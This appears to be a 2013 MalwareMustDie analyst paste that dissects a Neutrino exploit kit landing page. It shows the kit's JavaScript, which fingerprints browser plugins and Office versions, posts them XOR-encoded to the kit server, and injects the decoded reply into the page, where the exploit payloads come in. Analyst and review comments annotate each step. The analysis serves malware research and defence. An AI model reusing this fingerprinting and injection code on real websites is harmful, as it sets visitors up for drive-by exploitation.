MalwareMustDie

#MalwareMustDie! New form of Neutrino EK landing page?

Jul 26th, 2013
  1. // #MalwareMustDie!
  2. // My personal note..
  3. // New form of Neutrino EK landing page?
  4. // A quest! Where's the XOR data now? :-D
  5.  
  6.  
  7. <script src='xsvhwjx.js'></script>
  8. <script src='qmqsfiutp.js'>
  9. </script><script src='hrcl.js'></script>
  10. <link href='xbbcukphokdo.css' rel='stylesheet'>
  11. <link href='nhpgbsrcogf.css' rel='stylesheet'>
  12. <link href='bbehoufqwh.css' rel='stylesheet'>
  13.  
  14. <script src='gdhclsjileqh.js'></script>
  15. <script src='nrezixfqsy.js'></script>
  16. <script src='sgxvswm.js'></script>
  17. <script src='ztblmkuxokfcyxgy.js'></script>
  18. <script type="text/javascript" src="index.js"></script> // <=== @malwaremustdie: Plugindetect??
  19. <script src='dwwccp.js'></script>
  20. <script src='zkbvwzvq.js'></script>
  21.  
  22.  
  23. <script>
  24.  $(document).ready(function()  // NOTE(review): runs once the DOM is ready; its only action is the rq() call below
  25.  {
  26.    rq(
  27.         "51f2394faaa2cc390a075f4c",  // NOTE(review): a in rq() - reported back as the "hid" entry of the fingerprint
  28.         "eyhuui",        // <== @malforsec & @malwaremustdie: OK this is the key :-)  -- NOTE(review): c in rq(), the XOR key; rq() also posts it in clear
  29.         "uvkotuiae",    // <=== @malwaremustdie: POST command value  -- NOTE(review): this is f in rq(), used as the URL argument of $.post()
  30.         "ngrdddfrrlrzro",  // NOTE(review): e in rq() - name of the POST field that carries the key
  31.         "gfsjmndvvz"  // NOTE(review): g in rq() - name of the POST field that carries the XOR-encoded fingerprint
  32.      )
  33.  }
  34.  );
  35.  function rq(a,c,f,e,g)  // NOTE(review): a = id, c = XOR key, f = POST URL, e and g = POST field names. Collects plugin versions, posts them XOR-encoded, and appends the decoded reply to <body>.
  36.  {
  37.    var d=PluginDetect.getVersion,b=[];  // <== @malwaremustdie: PoC of PluginDetect v0.8.0  -- NOTE(review): d is just an alias for getVersion; b collects the report entries
  38.    b.push("hid:::"+a);  // NOTE(review): first entry is the id passed in as a
  39.    b.push("adobe_reader:::"+d("AdobeReader"));  // NOTE(review): this and the following entries are "label:::version" as returned by PluginDetect.getVersion
  40.    b.push("java:::"+d("Java"));
  41.    b.push("flash:::"+d("Flash"));
  42.    b.push("quick_time:::"+d("QuickTime"));
  43.    b.push("real_player:::"+d("RealPlayer"));
  44.    b.push("shockwave:::"+d("Shockwave"));
  45.    b.push("silver_light:::"+d("Silverlight"));
  46.    b.push("vlc:::"+d("VLC"));
  47.    b.push("wmp:::"+d("WMP"));
  48.    b.push("office:::"+office_ver());  // NOTE(review): Office is not asked of PluginDetect; office_ver() probes it separately
  49.    a={};  // NOTE(review): a is reused - from here on it is the POST data object, no longer the id
  50.    a[e]=c;                                        // <=== c = "eyhuui" (the key), not "51f2394faaa2cc390a075f4c" - that id was a, overwritten on the previous line. NOTE(review): the key is posted in clear under field name e.
  51.    a[g]=encodeURIComponent(www(b.join(";;;"),c));  // <== @malwaremustdie: Assembling the POST query.  -- NOTE(review): entries joined with ";;;", XORed with c, then URI-encoded, stored under field name g
  52.    $.post(f,a,function(a,  // NOTE(review): the callback's a and b shadow the outer a and b; inside the callback a is the first argument jQuery passes, the response data
  53.    b)
  54.    {
  55.      $("body").append(www(decodeURIComponent(a),c)) // <== @malwaremustdie: A DAT www is XOR function.  -- NOTE(review): the reply is URI-decoded, XORed with the same key c and inserted into the page as markup; because the request carries c in clear, a capture of this POST and its response is enough to decode both.
  56.    }
  57.    )
  58.  }
  59.  function www(a,c)        // <=== @malwaremustdie: XOR function under a camouflaged name  -- NOTE(review): a = text, c = key; returns a string with one output character per input character
  60.  {
  61.    for(var f="",e=0,g=0,e=0;e<a.length;e++) // <=== @malwaremustdie: XOR logic  -- NOTE(review): e is declared twice in the var list, which is harmless; the loop body is the comma expression on the next two lines
  62.        g=Math.floor(e%c.length),  // NOTE(review): key index wraps around with e % c.length; Math.floor changes nothing for these integer values
  63.        f+=String.fromCharCode(a.charCodeAt(e)^c.charCodeAt(g));  // NOTE(review): XOR of one character code of the text with one of the key; running www again with the same key restores the input, so rq() uses this one routine for both the request and the reply
  64.    return f
  65.  }
  66.  function office_ver()  // NOTE(review): returns "2010", "2007" or null depending on which SharePoint.OpenDocuments ActiveX controls can be instantiated; takes no arguments
  67.  {
  68.    var a=0,c=0;  // NOTE(review): both stay the number 0 unless the matching control below is created
  69.    try
  70.    {
  71.      a=new ActiveXObject("SharePoint.OpenDocuments.4")
  72.    }
  73.    catch(f)
  74.    {
  75.    }  // NOTE(review): failure is ignored on purpose; a keeps its initial 0
  76.    try
  77.    {
  78.      c=new ActiveXObject("SharePoint.OpenDocuments.3")
  79.    }
  80.    catch(e)
  81.    {
  82.    }  // <=== @malwaremustdie: here goes the exploit payloads access...  -- NOTE(review): this function itself only probes and returns a string; nothing is requested or loaded here
  83.    return"object"==typeof a&&"object"==typeof c?"2010":"number"==typeof a&&"object"==typeof c?"2007":null  // NOTE(review): both controls created -> "2010"; only the .3 control -> "2007"; every other case, including a browser where ActiveXObject does not exist and both constructors throw, -> null
  84.  };
  85.  
  86. </script>
  87.  
  88.  
  89. ----
  90. #MalwareMustDie!
  91. @unixfreaxjp ~]$ date
  92. Sat Jul 27 01:17:40 JST 2013